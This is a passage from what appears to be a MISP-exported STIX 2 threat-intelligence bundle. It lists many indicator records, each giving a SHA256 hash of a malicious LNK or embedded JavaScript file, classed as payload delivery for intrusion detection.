["misp:type=\"sha256\"", "misp:category=\"Payload delivery\"", "misp:to_ids=\"True\""]}, {"type": "indicator", "id": "indicator--52e26066-3aa6-477b-8bb9-48ebf9d10d84", "created_by_ref": "identity--5df15c12-89fc-45a7-9620-0044ac110004", "created": "2024-06-19T08:09:18.000Z", "modified": "2024-06-19T08:09:18.000Z", "description": "LNK", "pattern": "[file:hashes.SHA256 = 'f46b2a57ee2904ded87f6db77ed4373bfd71de12879bd939348ccb8fa8cc1403']", "valid_from": "2024-06-19T08:09:18Z", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "Payload delivery"}], "labels": ["misp:type=\"sha256\"", "misp:category=\"Payload delivery\"", "misp:to_ids=\"True\""]}, {"type": "indicator", "id": "indicator--5d423281-c758-4dc8-bd1d-a59b6bde3b63", "created_by_ref": "identity--5df15c12-89fc-45a7-9620-0044ac110004", "created": "2024-06-19T08:09:18.000Z", "modified": "2024-06-19T08:09:18.000Z", "description": "LNK", "pattern": "[file:hashes.SHA256 = 'a77789f32058b879d7e3831d2d20a885996b8f07694a954e1e717f0483660ccb']", "valid_from": "2024-06-19T08:09:18Z", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "Payload delivery"}], "labels": ["misp:type=\"sha256\"", "misp:category=\"Payload delivery\"", "misp:to_ids=\"True\""]}, {"type": "indicator", "id": "indicator--59ac70c5-34e7-466f-a686-959e2bda5b8c", "created_by_ref": "identity--5df15c12-89fc-45a7-9620-0044ac110004", "created": "2024-06-19T08:09:18.000Z", "modified": "2024-06-19T08:09:18.000Z", "description": "LNK", "pattern": "[file:hashes.SHA256 = '984e8b3dda2c87bc8e3d21a05b07a8f52799c99aa45584aa2671efe62b5184c2']", "valid_from": "2024-06-19T08:09:18Z", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "Payload delivery"}], "labels": ["misp:type=\"sha256\"", "misp:category=\"Payload delivery\"", "misp:to_ids=\"True\""]}, {"type": "indicator", "id": "indicator--a7a54017-989f-4729-a7de-58f11c46f35a", "created_by_ref": "identity--5df15c12-89fc-45a7-9620-0044ac110004", "created": 
"2024-06-19T08:09:18.000Z", "modified": "2024-06-19T08:09:18.000Z", "description": "LNK", "pattern": "[file:hashes.SHA256 = '3f23d9ffc16c5f455f7bd02bf57667efb3d0a645ffa13fa38e0a6f5022208dd4']", "valid_from": "2024-06-19T08:09:18Z", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "Payload delivery"}], "labels": ["misp:type=\"sha256\"", "misp:category=\"Payload delivery\"", "misp:to_ids=\"True\""]}, {"type": "indicator", "id": "indicator--789e13a5-c534-4aa0-87ad-22c9d436c9b8", "created_by_ref": "identity--5df15c12-89fc-45a7-9620-0044ac110004", "created": "2024-06-19T08:09:18.000Z", "modified": "2024-06-19T08:09:18.000Z", "description": "LNK", "pattern": "[file:hashes.SHA256 = '4e18b57c586b3bfb6bd825ecbee2bdfcce91c8414e40c0a7655edc327d62ac0f']", "valid_from": "2024-06-19T08:09:18Z", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "Payload delivery"}], "labels": ["misp:type=\"sha256\"", "misp:category=\"Payload delivery\"", "misp:to_ids=\"True\""]}, {"type": "indicator", "id": "indicator--fe29b845-1b6c-4fd5-92cf-660c1908ef11", "created_by_ref": "identity--5df15c12-89fc-45a7-9620-0044ac110004", "created": "2024-06-19T08:09:18.000Z", "modified": "2024-06-19T08:09:18.000Z", "description": "LNK", "pattern": "[file:hashes.SHA256 = 'f4ffced2a4c7f3e48f2a43e17e58f8feb0ad6cb2ad98fafc87d9a159230810fa']", "valid_from": "2024-06-19T08:09:18Z", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "Payload delivery"}], "labels": ["misp:type=\"sha256\"", "misp:category=\"Payload delivery\"", "misp:to_ids=\"True\""]}, {"type": "indicator", "id": "indicator--f25385ef-e065-42dc-8a63-0517c352f28a", "created_by_ref": "identity--5df15c12-89fc-45a7-9620-0044ac110004", "created": "2024-06-19T08:09:18.000Z", "modified": "2024-06-19T08:09:18.000Z", "description": "LNK", "pattern": "[file:hashes.SHA256 = '9483bccb2b0964d11b13ca01fba7ba6a21a531807d48eb3182ceaf7ed240ef2b']", "valid_from": "2024-06-19T08:09:18Z", 
"kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "Payload delivery"}], "labels": ["misp:type=\"sha256\"", "misp:category=\"Payload delivery\"", "misp:to_ids=\"True\""]}, {"type": "indicator", "id": "indicator--3aa88adf-d56b-4ce9-9d48-3d4e9440bff7", "created_by_ref": "identity--5df15c12-89fc-45a7-9620-0044ac110004", "created": "2024-06-19T08:09:18.000Z", "modified": "2024-06-19T08:09:18.000Z", "description": "LNK", "pattern": "[file:hashes.SHA256 = '26f92ea9f5eb220d9e544af757c57e5672971b9cd43b166e65c055b6978d6031']", "valid_from": "2024-06-19T08:09:18Z", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "Payload delivery"}], "labels": ["misp:type=\"sha256\"", "misp:category=\"Payload delivery\"", "misp:to_ids=\"True\""]}, {"type": "indicator", "id": "indicator--68baf0be-5855-4540-ba40-065119dad0c0", "created_by_ref": "identity--5df15c12-89fc-45a7-9620-0044ac110004", "created": "2024-06-19T08:09:18.000Z", "modified": "2024-06-19T08:09:18.000Z", "description": "LNK", "pattern": "[file:hashes.SHA256 = '2c8116dce38993762cdb687eab69786b9ccd1bd8c569dee8bef5a226579224bb']", "valid_from": "2024-06-19T08:09:18Z", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "Payload delivery"}], "labels": ["misp:type=\"sha256\"", "misp:category=\"Payload delivery\"", "misp:to_ids=\"True\""]}, {"type": "indicator", "id": "indicator--6b296be4-3e6f-40fd-a449-7681141df090", "created_by_ref": "identity--5df15c12-89fc-45a7-9620-0044ac110004", "created": "2024-06-19T08:09:18.000Z", "modified": "2024-06-19T08:09:18.000Z", "description": "LNK", "pattern": "[file:hashes.SHA256 = '4bcf097c19e18e3b3bfa4c45ebb4e67d565a0984211edf9e2fdc042b43141317']", "valid_from": "2024-06-19T08:09:18Z", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "Payload delivery"}], "labels": ["misp:type=\"sha256\"", "misp:category=\"Payload delivery\"", "misp:to_ids=\"True\""]}, {"type": "indicator", "id": 
"indicator--977a76ea-ca17-43fe-a7ca-99b89a8d3982", "created_by_ref": "identity--5df15c12-89fc-45a7-9620-0044ac110004", "created": "2024-06-19T08:09:18.000Z", "modified": "2024-06-19T08:09:18.000Z", "description": "LNK", "pattern": "[file:hashes.SHA256 = '67b648a7f0d24e5b56e83f73f9494be6a63f4d7372c960a2134054352c9c3490']", "valid_from": "2024-06-19T08:09:18Z", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "Payload delivery"}], "labels": ["misp:type=\"sha256\"", "misp:category=\"Payload delivery\"", "misp:to_ids=\"True\""]}, {"type": "indicator", "id": "indicator--3ecffff1-414e-4bc9-94f2-56650b0cfaf5", "created_by_ref": "identity--5df15c12-89fc-45a7-9620-0044ac110004", "created": "2024-06-19T08:09:18.000Z", "modified": "2024-06-19T08:09:18.000Z", "description": "LNK", "pattern": "[file:hashes.SHA256 = '9ce558dc6af9c183d15012a5012a36184586e40f8a461a948192c3f055201766']", "valid_from": "2024-06-19T08:09:18Z", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "Payload delivery"}], "labels": ["misp:type=\"sha256\"", "misp:category=\"Payload delivery\"", "misp:to_ids=\"True\""]}, {"type": "indicator", "id": "indicator--bc044436-e162-43e9-bd85-d5505ec006e2", "created_by_ref": "identity--5df15c12-89fc-45a7-9620-0044ac110004", "created": "2024-06-19T08:09:18.000Z", "modified": "2024-06-19T08:09:18.000Z", "description": "LNK", "pattern": "[file:hashes.SHA256 = 'b5953319cb28a0db7a70dff03949f1d98487456a273ac3cfb1f70f8cb3b07c18']", "valid_from": "2024-06-19T08:09:18Z", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "Payload delivery"}], "labels": ["misp:type=\"sha256\"", "misp:category=\"Payload delivery\"", "misp:to_ids=\"True\""]}, {"type": "indicator", "id": "indicator--68574461-cd05-4934-8248-f4d40f36f1a6", "created_by_ref": "identity--5df15c12-89fc-45a7-9620-0044ac110004", "created": "2024-06-19T08:09:18.000Z", "modified": "2024-06-19T08:09:18.000Z", "description": "LNK", "pattern": 
"[file:hashes.SHA256 = 'e4b8fe0b0a87e5844deee4668d7638acd3ab9ea60a947eb1b32a4bd0691e5411']", "valid_from": "2024-06-19T08:09:18Z", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "Payload delivery"}], "labels": ["misp:type=\"sha256\"", "misp:category=\"Payload delivery\"", "misp:to_ids=\"True\""]}, {"type": "indicator", "id": "indicator--07b6cb8e-3e1c-469e-9709-602aaac1faf7", "created_by_ref": "identity--5df15c12-89fc-45a7-9620-0044ac110004", "created": "2024-06-19T08:09:18.000Z", "modified": "2024-06-19T08:09:18.000Z", "description": "LNK", "pattern": "[file:hashes.SHA256 = '7fffe1969dee2b4c72b4c5d0c75e493ecf6f3598a89d8538be3e7c53b898bbff']", "valid_from": "2024-06-19T08:09:18Z", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "Payload delivery"}], "labels": ["misp:type=\"sha256\"", "misp:category=\"Payload delivery\"", "misp:to_ids=\"True\""]}, {"type": "indicator", "id": "indicator--997b6c33-fa08-44aa-b395-d1de793a998e", "created_by_ref": "identity--5df15c12-89fc-45a7-9620-0044ac110004", "created": "2024-06-19T08:09:18.000Z", "modified": "2024-06-19T08:09:18.000Z", "description": "LNK", "pattern": "[file:hashes.SHA256 = '6cb99d0073d2e6b7e15b22a74b98901dccb3c328d88f6e1c38b0af0379dd388c']", "valid_from": "2024-06-19T08:09:18Z", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "Payload delivery"}], "labels": ["misp:type=\"sha256\"", "misp:category=\"Payload delivery\"", "misp:to_ids=\"True\""]}, {"type": "indicator", "id": "indicator--9a44f194-35dd-448f-93c2-487c57e749af", "created_by_ref": "identity--5df15c12-89fc-45a7-9620-0044ac110004", "created": "2024-06-19T08:09:18.000Z", "modified": "2024-06-19T08:09:18.000Z", "description": "LNK", "pattern": "[file:hashes.SHA256 = '5a3811aee5156d928b2b634b512d382d89f8203cb883cab743a54cbc4f3f41f1']", "valid_from": "2024-06-19T08:09:18Z", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "Payload delivery"}], "labels": 
["misp:type=\"sha256\"", "misp:category=\"Payload delivery\"", "misp:to_ids=\"True\""]}, {"type": "indicator", "id": "indicator--7d175867-b502-4d40-ad5a-5a3788eea7fc", "created_by_ref": "identity--5df15c12-89fc-45a7-9620-0044ac110004", "created": "2024-06-19T08:09:18.000Z", "modified": "2024-06-19T08:09:18.000Z", "description": "LNK", "pattern": "[file:hashes.SHA256 = 'bfcfa5e291b0c9201344a73c8ef25c2912561e32c48af0ae0d30ad8199ffc8c4']", "valid_from": "2024-06-19T08:09:18Z", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "Payload delivery"}], "labels": ["misp:type=\"sha256\"", "misp:category=\"Payload delivery\"", "misp:to_ids=\"True\""]}, {"type": "indicator", "id": "indicator--ed9084b6-c33c-4dce-b107-4603fff35966", "created_by_ref": "identity--5df15c12-89fc-45a7-9620-0044ac110004", "created": "2024-06-19T08:09:18.000Z", "modified": "2024-06-19T08:09:18.000Z", "description": "LNK", "pattern": "[file:hashes.SHA256 = 'c4a912f776579aa0126bbadd9261a4cd6efb3bcb5f5c7d64e96b11f3bdbc214b']", "valid_from": "2024-06-19T08:09:18Z", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "Payload delivery"}], "labels": ["misp:type=\"sha256\"", "misp:category=\"Payload delivery\"", "misp:to_ids=\"True\""]}, {"type": "indicator", "id": "indicator--a8c429c2-ef1a-4f74-8d72-10bb5e7210b0", "created_by_ref": "identity--5df15c12-89fc-45a7-9620-0044ac110004", "created": "2024-06-19T08:09:18.000Z", "modified": "2024-06-19T08:09:18.000Z", "description": "LNK", "pattern": "[file:hashes.SHA256 = 'f92c275dfd051481cb03557213195647dd7c68edf9f7beddcff0aadf298f371b']", "valid_from": "2024-06-19T08:09:18Z", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "Payload delivery"}], "labels": ["misp:type=\"sha256\"", "misp:category=\"Payload delivery\"", "misp:to_ids=\"True\""]}, {"type": "indicator", "id": "indicator--89479bdf-bf86-49f5-a969-748f027dba61", "created_by_ref": "identity--5df15c12-89fc-45a7-9620-0044ac110004", "created": 
"2024-06-19T08:09:18.000Z", "modified": "2024-06-19T08:09:18.000Z", "description": "LNK", "pattern": "[file:hashes.SHA256 = '1b14de17a12cdb92210b8543e3418c16f9fe00db3394fa74ab3a8f1c5904ecf0']", "valid_from": "2024-06-19T08:09:18Z", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "Payload delivery"}], "labels": ["misp:type=\"sha256\"", "misp:category=\"Payload delivery\"", "misp:to_ids=\"True\""]}, {"type": "indicator", "id": "indicator--126aafdd-72f0-4504-89c7-b90116dfc292", "created_by_ref": "identity--5df15c12-89fc-45a7-9620-0044ac110004", "created": "2024-06-19T08:09:18.000Z", "modified": "2024-06-19T08:09:18.000Z", "description": "LNK", "pattern": "[file:hashes.SHA256 = 'c4e2301615cbab9abf2d94327bb7839df64d88fc5c508a2f33c3f0fc881be7c3']", "valid_from": "2024-06-19T08:09:18Z", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "Payload delivery"}], "labels": ["misp:type=\"sha256\"", "misp:category=\"Payload delivery\"", "misp:to_ids=\"True\""]}, {"type": "indicator", "id": "indicator--a7b2209d-aba8-416f-9ac0-e288db94a9ee", "created_by_ref": "identity--5df15c12-89fc-45a7-9620-0044ac110004", "created": "2024-06-19T08:09:18.000Z", "modified": "2024-06-19T08:09:18.000Z", "description": "LNK", "pattern": "[file:hashes.SHA256 = '066b3631682f63b4a44ecfa5b6dfb100d8052429a7e1c5b1ba8cab4832529f26']", "valid_from": "2024-06-19T08:09:18Z", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "Payload delivery"}], "labels": ["misp:type=\"sha256\"", "misp:category=\"Payload delivery\"", "misp:to_ids=\"True\""]}, {"type": "indicator", "id": "indicator--6523bb7c-2bd5-4574-947e-6816950dd159", "created_by_ref": "identity--5df15c12-89fc-45a7-9620-0044ac110004", "created": "2024-06-19T08:09:18.000Z", "modified": "2024-06-19T08:09:18.000Z", "description": "LNK", "pattern": "[file:hashes.SHA256 = 'fb76bc19e177372d210bcfe9b1f35fb296b0b7cb64f0ad5075a64d06a3c85159']", "valid_from": "2024-06-19T08:09:18Z", 
"kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "Payload delivery"}], "labels": ["misp:type=\"sha256\"", "misp:category=\"Payload delivery\"", "misp:to_ids=\"True\""]}, {"type": "indicator", "id": "indicator--959144ec-707c-44f3-a92d-452269b0659b", "created_by_ref": "identity--5df15c12-89fc-45a7-9620-0044ac110004", "created": "2024-06-19T08:09:18.000Z", "modified": "2024-06-19T08:09:18.000Z", "description": "LNK", "pattern": "[file:hashes.SHA256 = '2c4356614ddeb8085367167b301a8e437166142e738adb27bf26c09da3acae56']", "valid_from": "2024-06-19T08:09:18Z", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "Payload delivery"}], "labels": ["misp:type=\"sha256\"", "misp:category=\"Payload delivery\"", "misp:to_ids=\"True\""]}, {"type": "indicator", "id": "indicator--31cc7055-d867-4912-aa55-1d34d60562ba", "created_by_ref": "identity--5df15c12-89fc-45a7-9620-0044ac110004", "created": "2024-06-19T08:09:18.000Z", "modified": "2024-06-19T08:09:18.000Z", "description": "LNK", "pattern": "[file:hashes.SHA256 = '4b1b7257fd376286501043eb27debc850300a674962068e044a34e697381d694']", "valid_from": "2024-06-19T08:09:18Z", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "Payload delivery"}], "labels": ["misp:type=\"sha256\"", "misp:category=\"Payload delivery\"", "misp:to_ids=\"True\""]}, {"type": "indicator", "id": "indicator--88032f64-0a3a-468a-b20f-e67fd5972b62", "created_by_ref": "identity--5df15c12-89fc-45a7-9620-0044ac110004", "created": "2024-06-19T08:09:18.000Z", "modified": "2024-06-19T08:09:18.000Z", "description": "LNK", "pattern": "[file:hashes.SHA256 = '0618b63352d0ae02d0f02ce8adf02d1c16fd56b18e903622bc95e520388743e0']", "valid_from": "2024-06-19T08:09:18Z", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "Payload delivery"}], "labels": ["misp:type=\"sha256\"", "misp:category=\"Payload delivery\"", "misp:to_ids=\"True\""]}, {"type": "indicator", "id": 
"indicator--6ee2deb3-c786-4338-af18-3e88efe32b67", "created_by_ref": "identity--5df15c12-89fc-45a7-9620-0044ac110004", "created": "2024-06-19T08:09:18.000Z", "modified": "2024-06-19T08:09:18.000Z", "description": "LNK", "pattern": "[file:hashes.SHA256 = '792ca7508ce158e20eff7b838fafb6120afc81b3677a84eb066810544ccf1577']", "valid_from": "2024-06-19T08:09:18Z", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "Payload delivery"}], "labels": ["misp:type=\"sha256\"", "misp:category=\"Payload delivery\"", "misp:to_ids=\"True\""]}, {"type": "indicator", "id": "indicator--d5d14874-da5c-41e7-b34c-865cff787ce9", "created_by_ref": "identity--5df15c12-89fc-45a7-9620-0044ac110004", "created": "2024-06-19T08:09:18.000Z", "modified": "2024-06-19T08:09:18.000Z", "description": "LNK", "pattern": "[file:hashes.SHA256 = '49fa747eee1bebed9bbb74b7b555f8018fb4e0e11f74349c2f7ac89a225d27f8']", "valid_from": "2024-06-19T08:09:18Z", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "Payload delivery"}], "labels": ["misp:type=\"sha256\"", "misp:category=\"Payload delivery\"", "misp:to_ids=\"True\""]}, {"type": "indicator", "id": "indicator--942c6dab-ec03-4a4e-b67f-7670d140f344", "created_by_ref": "identity--5df15c12-89fc-45a7-9620-0044ac110004", "created": "2024-06-19T08:09:18.000Z", "modified": "2024-06-19T08:09:18.000Z", "description": "LNK", "pattern": "[file:hashes.SHA256 = '1b9604b50e8c0c6cf2496855a3c367d72fc447839fab708b20d649cf276f572a']", "valid_from": "2024-06-19T08:09:18Z", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "Payload delivery"}], "labels": ["misp:type=\"sha256\"", "misp:category=\"Payload delivery\"", "misp:to_ids=\"True\""]}, {"type": "indicator", "id": "indicator--92124619-f4a4-4944-a23a-1e03b6eea724", "created_by_ref": "identity--5df15c12-89fc-45a7-9620-0044ac110004", "created": "2024-06-19T08:09:18.000Z", "modified": "2024-06-19T08:09:18.000Z", "description": "LNK", "pattern": 
"[file:hashes.SHA256 = '698c73f004e7f46bc371e0476193456071d9f7df9662cca7aa0e010b4fcedf57']", "valid_from": "2024-06-19T08:09:18Z", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "Payload delivery"}], "labels": ["misp:type=\"sha256\"", "misp:category=\"Payload delivery\"", "misp:to_ids=\"True\""]}, {"type": "indicator", "id": "indicator--5cf81593-976c-432d-be3d-a81bbe050c96", "created_by_ref": "identity--5df15c12-89fc-45a7-9620-0044ac110004", "created": "2024-06-19T08:09:18.000Z", "modified": "2024-06-19T08:09:18.000Z", "description": "LNK", "pattern": "[file:hashes.SHA256 = '0986b26fcc87723d73e80c280f1bbc221fdb188ab8666f098caac6d896f1c4d1']", "valid_from": "2024-06-19T08:09:18Z", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "Payload delivery"}], "labels": ["misp:type=\"sha256\"", "misp:category=\"Payload delivery\"", "misp:to_ids=\"True\""]}, {"type": "indicator", "id": "indicator--7afd12ad-b68d-4719-b735-716351d822b8", "created_by_ref": "identity--5df15c12-89fc-45a7-9620-0044ac110004", "created": "2024-06-19T08:09:18.000Z", "modified": "2024-06-19T08:09:18.000Z", "description": "LNK", "pattern": "[file:hashes.SHA256 = '27ace9002f5bc7b3474ec3ec7ac72ed094fa2d29d9b2e8b5b1a787b50afd4f05']", "valid_from": "2024-06-19T08:09:18Z", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "Payload delivery"}], "labels": ["misp:type=\"sha256\"", "misp:category=\"Payload delivery\"", "misp:to_ids=\"True\""]}, {"type": "indicator", "id": "indicator--4ea64b7c-4b70-4d7d-9659-2ca422c9e406", "created_by_ref": "identity--5df15c12-89fc-45a7-9620-0044ac110004", "created": "2024-06-19T08:09:18.000Z", "modified": "2024-06-19T08:09:18.000Z", "description": "LNK", "pattern": "[file:hashes.SHA256 = 'e498efd08ced0eccaebc4721cee807858d40fde428fd5ea61ce06272a25282a0']", "valid_from": "2024-06-19T08:09:18Z", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "Payload delivery"}], "labels": 
["misp:type=\"sha256\"", "misp:category=\"Payload delivery\"", "misp:to_ids=\"True\""]}, {"type": "indicator", "id": "indicator--a6f4314b-f37e-42fa-a6a6-a9b453052f91", "created_by_ref": "identity--5df15c12-89fc-45a7-9620-0044ac110004", "created": "2024-06-19T08:09:18.000Z", "modified": "2024-06-19T08:09:18.000Z", "description": "LNK", "pattern": "[file:hashes.SHA256 = '26dfb13aea6f55e01f4dc54bb91ea7d9afd3bd73bd0c95b63345364ed149ff80']", "valid_from": "2024-06-19T08:09:18Z", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "Payload delivery"}], "labels": ["misp:type=\"sha256\"", "misp:category=\"Payload delivery\"", "misp:to_ids=\"True\""]}, {"type": "indicator", "id": "indicator--26606ab3-6101-44d4-9da1-b3d924fae337", "created_by_ref": "identity--5df15c12-89fc-45a7-9620-0044ac110004", "created": "2024-06-19T08:09:18.000Z", "modified": "2024-06-19T08:09:18.000Z", "description": "Embedded JS", "pattern": "[file:hashes.SHA256 = 'aa58e1b322877ff660961e18558488c49491a523a12373f95c41a1dfe60ad477']", "valid_from": "2024-06-19T08:09:18Z", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "Payload delivery"}], "labels": ["misp:type=\"sha256\"", "misp:category=\"Payload delivery\"", "misp:to_ids=\"True\""]}, {"type": "indicator", "id": "indicator--aa71e0e1-5235-4c45-be95-c23d8e0e292f", "created_by_ref": "identity--5df15c12-89fc-45a7-9620-0044ac110004", "created": "2024-06-19T08:09:18.000Z", "modified": "2024-06-19T08:09:18.000Z", "description": "Embedded JS", "pattern": "[file:hashes.SHA256 = '43c40fe84b53b2573564331db15f5fea8cdf599d6c9c2f361dd154a9b78cd6aa']", "valid_from": "2024-06-19T08:09:18Z", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "Payload delivery"}], "labels": ["misp:type=\"sha256\"", "misp:category=\"Payload delivery\"", "misp:to_ids=\"True\""]}, {"type": "indicator", "id": "indicator--5f47370a-c025-4e1d-946d-45184c0ee928", "created_by_ref": 
"identity--5df15c12-89fc-45a7-9620-0044ac110004", "created": "2024-06-19T08:09:18.000Z", "modified": "2024-06-19T08:09:18.000Z", "description": "Embedded JS", "pattern": "[file:hashes.SHA256 = '3df795503a11b3c1a7ce3aeaf72f436ec9d7704c8189f9aa4abbc4f6db69d155']", "valid_from": "2024-06-19T08:09:18Z", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "Payload delivery"}], "labels": ["misp:type=\"sha256\"", "misp:category=\"Payload delivery\"", "misp:to_ids=\"True\""]}, {"type": "indicator", "id": "indicator--973c2dfb-4f4e-4c29-b699-cd32b838913a", "created_by_ref": "identity--5df15c12-89fc-45a7-9620-0044ac110004", "created": "2024-06-19T08:09:18.000Z", "modified": "2024-06-19T08:09:18.000Z", "description": "Embedded JS", "pattern": "[file:hashes.SHA256 = 'f0f587aa4eac787e4caf5f4b8795b7cc8a4c33fbb518ec2d616516076570f393']", "valid_from": "2024-06-19T08:09:18Z", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "Payload delivery"}], "labels": ["misp:type=\"sha256\"", "misp:category=\"Payload delivery\"", "misp:to_ids=\"True\""]}, {"type": "indicator", "id": "indicator--5ac26f12-ebf6-4a79-9b3a-461a61fd0336", "created_by_ref": "identity--5df15c12-89fc-45a7-9620-0044ac110004", "created": "2024-06-19T08:09:18.000Z", "modified": "2024-06-19T08:09:18.000Z", "description": "Embedded JS", "pattern": "[file:hashes.SHA256 = 'bae38315e5a6622d01b66db561efa206e698f3cb6157645dabd4f0267b8d2c91']", "valid_from": "2024-06-19T08:09:18Z", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "Payload delivery"}], "labels": ["misp:type=\"sha256\"", "misp:category=\"Payload delivery\"", "misp:to_ids=\"True\""]}, {"type": "indicator", "id": "indicator--a8b9e47f-9f86-466a-a680-3f7b7d9b54ec", "created_by_ref": "identity--5df15c12-89fc-45a7-9620-0044ac110004", "created": "2024-06-19T08:09:18.000Z", "modified": "2024-06-19T08:09:18.000Z", "description": "Embedded JS", "pattern": "[file:hashes.SHA256 = 
'5779a2234b05311716259837998997847d56cdcd421cacf0a1860bbe4ba70b79']", "valid_from": "2024-06-19T08:09:18Z", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "Payload delivery"}], "labels": ["misp:type=\"sha256\"", "misp:category=\"Payload delivery\"", "misp:to_ids=\"True\""]}, {"type": "indicator", "id": "indicator--616aa340-4ff5-4e9f-9d2a-402b2c0d208b", "created_by_ref": "identity--5df15c12-89fc-45a7-9620-0044ac110004", "created": "2024-06-19T08:09:18.000Z", "modified": "2024-06-19T08:09:18.000Z", "description": "Embedded JS", "pattern": "[file:hashes.SHA256 = '35a9c2e8d911c8793a4b464633beaa2c6772601d6d58bf12c456e694a4adcf46']", "valid_from": "2024-06-19T08:09:18Z", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "Payload delivery"}], "labels": ["misp:type=\"sha256\"", "misp:category=\"Payload delivery\"", "misp:to_ids=\"True\""]}, {"type": "indicator", "id": "indicator--5b9787cf-0a5d-47f4-933e-4b9cf044e232", "created_by_ref": "identity--5df15c12-89fc-45a7-9620-0044ac110004", "created": "2024-06-19T08:09:18.000Z", "modified": "2024-06-19T08:09:18.000Z", "description": "Embedded JS", "pattern": "[file:hashes.SHA256 = '220dd9d5ba1c6e087c8294eb01b7e0dfeb39b3a9c99567da102df44b2f04dbd7']", "valid_from": "2024-06-19T08:09:18Z", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "Payload delivery"}], "labels": ["misp:type=\"sha256\"", "misp:category=\"Payload delivery\"", "misp:to_ids=\"True\""]}, {"type": "indicator", "id": "indicator--1ca57c2b-8e4a-42ed-bafa-a106cbbc363d", "created_by_ref": "identity--5df15c12-89fc-45a7-9620-0044ac110004", "created": "2024-06-19T08:09:18.000Z", "modified": "2024-06-19T08:09:18.000Z", "description": "Embedded JS", "pattern": "[file:hashes.SHA256 = 'dd4fc4760401b8dc37b0a823af19d0f7b5c2039704caf5327f8f8c6d00bd148c']", "valid_from": "2024-06-19T08:09:18Z", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "Payload delivery"}], "labels": 
["misp:type=\"sha256\"", "misp:category=\"Payload delivery\"", "misp:to_ids=\"True\""]}, {"type": "indicator", "id": "indicator--21caa1eb-3474-417d-b840-ee0290dc3383", "created_by_ref": "identity--5df15c12-89fc-45a7-9620-0044ac110004", "created": "2024-06-19T08:09:18.000Z", "modified": "2024-06-19T08:09:18.000Z", "description": "Embedded JS", "pattern": "[file:hashes.SHA256 = 'd18cf366f549a8828dc02e6540a191b3625da36995806dab559d6b020fe74695']", "valid_from": "2024-06-19T08:09:18Z", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "Payload delivery"}], "labels": ["misp:type=\"sha256\"", "misp:category=\"Payload delivery\"", "misp:to_ids=\"True\""]}, {"type": "indicator", "id": "indicator--a3e537e4-aa48-42e0-bcce-389268fc9af0", "created_by_ref": "identity--5df15c12-89fc-45a7-9620-0044ac110004", "created": "2024-06-19T08:09:18.000Z", "modified": "2024-06-19T08:09:18.000Z", "description": "Embedded JS", "pattern": "[file:hashes.SHA256 = 'db6a8b9988ab1b83d8c1e6b5bd0a4bbf2baacf1ed84220026f9ae8a867e5eec2']", "valid_from": "2024-06-19T08:09:18Z", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "Payload delivery"}], "labels": ["misp:type=\"sha256\"", "misp:category=\"Payload delivery\"", "misp:to_ids=\"True\""]}, {"type": "indicator", "id": "indicator--c889a5a6-fbdb-4441-8e6e-d8c66199a6fb", "created_by_ref": "identity--5df15c12-89fc-45a7-9620-0044ac110004", "created": "2024-06-19T08:09:18.000Z", "modified": "2024-06-19T08:09:18.000Z", "description": "Embedded JS", "pattern": "[file:hashes.SHA256 = 'e121a6c8cccecbe1a27c2003c255096f04c23f13b24a1f035775348f2aae53d0']", "valid_from": "2024-06-19T08:09:18Z", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "Payload delivery"}], "labels": ["misp:type=\"sha256\"", "misp:category=\"Payload delivery\"", "misp:to_ids=\"True\""]}, {"type": "indicator", "id": "indicator--d59829f8-181f-4c85-9513-0320e8e21465", "created_by_ref": 
